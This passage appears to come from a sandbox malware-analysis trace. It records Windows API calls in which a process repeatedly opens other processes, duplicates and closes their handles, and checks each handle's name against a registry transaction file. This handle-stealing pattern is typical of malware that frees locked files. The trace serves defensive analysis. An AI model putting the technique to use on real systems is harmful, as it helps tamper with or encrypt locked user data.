lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.032] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.033] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.033] CloseHandle (hObject=0x1e4) returned 1 [0164.033] _wcsicmp (_Str1="\\umpnpmgr.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 7 [0164.033] CloseHandle (hObject=0x194) returned 1 [0164.034] CloseHandle (hObject=0x1e8) returned 1 [0164.034] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.034] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.034] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.034] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.040] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.040] CloseHandle (hObject=0x1e4) returned 1 [0164.040] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.040] CloseHandle (hObject=0x194) returned 1 [0164.040] CloseHandle (hObject=0x1e8) returned 1 [0164.040] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.040] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x84, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.040] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.041] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.042] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.042] CloseHandle (hObject=0x1e4) returned 1 [0164.042] CloseHandle (hObject=0x194) returned 1 [0164.042] CloseHandle (hObject=0x1e8) returned 1 [0164.042] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.042] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.042] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.043] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.044] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.044] CloseHandle (hObject=0x1e4) returned 1 [0164.044] CloseHandle (hObject=0x194) returned 1 [0164.044] CloseHandle (hObject=0x1e8) returned 1 [0164.044] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.045] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x164, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.046] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.047] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.047] CloseHandle (hObject=0x1e4) returned 1 [0164.047] CloseHandle (hObject=0x194) returned 1 [0164.047] CloseHandle (hObject=0x1e8) returned 1 [0164.047] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.047] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x168, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.048] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.048] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.049] CloseHandle (hObject=0x1e4) returned 1 [0164.049] CloseHandle (hObject=0x194) returned 1 [0164.049] CloseHandle (hObject=0x1e8) returned 1 [0164.049] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.049] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x170, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.049] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.050] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.050] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.051] CloseHandle (hObject=0x1e4) returned 1 [0164.051] _wcsicmp (_Str1="\\CatalogChangeListener-294-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.051] CloseHandle (hObject=0x194) returned 1 [0164.051] CloseHandle (hObject=0x1e8) returned 1 [0164.051] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.051] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.052] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.053] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.053] CloseHandle (hObject=0x1e4) returned 1 [0164.053] CloseHandle (hObject=0x194) returned 1 [0164.053] CloseHandle (hObject=0x1e8) returned 1 [0164.053] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.053] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.053] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.054] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.055] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.055] CloseHandle (hObject=0x1e4) returned 1 [0164.055] CloseHandle (hObject=0x194) returned 1 [0164.055] CloseHandle (hObject=0x1e8) returned 1 [0164.055] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.055] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.056] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.057] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.057] CloseHandle (hObject=0x1e4) returned 1 [0164.057] CloseHandle (hObject=0x194) returned 1 [0164.057] CloseHandle (hObject=0x1e8) returned 1 [0164.057] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.057] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.057] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.058] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.058] CloseHandle (hObject=0x1e4) returned 1 [0164.058] CloseHandle (hObject=0x194) returned 1 [0164.058] CloseHandle (hObject=0x1e8) returned 1 [0164.059] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.059] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.060] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.060] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.060] CloseHandle (hObject=0x1e4) returned 1 [0164.060] CloseHandle (hObject=0x194) returned 1 [0164.061] CloseHandle (hObject=0x1e8) returned 1 [0164.061] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.061] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.061] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.062] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.062] CloseHandle (hObject=0x1e4) returned 1 [0164.062] CloseHandle (hObject=0x194) returned 1 [0164.062] CloseHandle (hObject=0x1e8) returned 1 [0164.062] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.062] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.063] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.064] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.064] CloseHandle (hObject=0x1e4) returned 1 [0164.064] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.064] CloseHandle (hObject=0x194) returned 1 [0164.064] CloseHandle (hObject=0x1e8) returned 1 [0164.064] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.064] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.065] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.065] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.066] CloseHandle (hObject=0x1e4) returned 1 [0164.066] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.066] CloseHandle (hObject=0x194) returned 1 [0164.066] CloseHandle (hObject=0x1e8) returned 1 [0164.066] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0164.066] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.066] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.067] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.067] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.067] CloseHandle (hObject=0x1e4) returned 1 [0164.067] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.067] CloseHandle (hObject=0x194) returned 1 [0164.068] CloseHandle (hObject=0x1e8) returned 1 [0164.068] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.068] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.068] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.069] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.069] CloseHandle (hObject=0x1e4) returned 1 [0164.069] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0164.069] CloseHandle (hObject=0x194) returned 1 [0164.069] CloseHandle (hObject=0x1e8) returned 1 [0164.069] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.069] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.069] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.070] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.071] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.071] CloseHandle (hObject=0x1e4) returned 1 [0164.071] CloseHandle (hObject=0x194) returned 1 [0164.071] CloseHandle (hObject=0x1e8) returned 1 [0164.071] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.071] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.071] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.072] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.073] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.073] CloseHandle (hObject=0x1e4) returned 1 [0164.073] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.073] CloseHandle (hObject=0x194) returned 1 [0164.073] CloseHandle (hObject=0x1e8) returned 1 [0164.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.073] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.074] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.075] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.080] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.080] CloseHandle (hObject=0x1e4) returned 1 [0164.081] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.081] CloseHandle (hObject=0x194) returned 1 [0164.081] CloseHandle (hObject=0x1e8) returned 1 [0164.081] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.081] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.081] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.082] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.083] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.083] CloseHandle (hObject=0x1e4) returned 1 [0164.083] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -9 [0164.083] CloseHandle (hObject=0x194) returned 1 [0164.084] CloseHandle (hObject=0x1e8) returned 1 [0164.084] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.084] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.085] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.086] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.086] CloseHandle (hObject=0x1e4) returned 1 [0164.086] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.086] CloseHandle (hObject=0x194) returned 1 [0164.086] CloseHandle (hObject=0x1e8) returned 1 [0164.086] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.086] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.086] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.087] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.088] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.088] CloseHandle (hObject=0x1e4) returned 1 [0164.088] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0164.088] CloseHandle (hObject=0x194) returned 1 [0164.088] CloseHandle (hObject=0x1e8) returned 1 [0164.088] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.088] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.088] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.089] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.090] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.090] CloseHandle (hObject=0x1e4) returned 1 [0164.090] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -1 [0164.090] CloseHandle (hObject=0x194) returned 1 [0164.090] CloseHandle (hObject=0x1e8) returned 1 [0164.091] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.091] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.091] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.091] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.092] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.092] CloseHandle (hObject=0x1e4) returned 1 [0164.092] CloseHandle (hObject=0x194) returned 1 [0164.092] CloseHandle (hObject=0x1e8) returned 1 [0164.093] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.093] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.093] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.093] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.094] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.094] CloseHandle (hObject=0x1e4) returned 1 [0164.094] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0164.094] CloseHandle (hObject=0x194) returned 1 [0164.094] CloseHandle (hObject=0x1e8) returned 1 [0164.094] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0164.094] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0164.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0164.095] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0164.096] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0164.096] CloseHandle (hObject=0x1e4) returned 1 [0164.096] CloseHandle (hObject=0x194) returned 1 [0164.096] CloseHandle 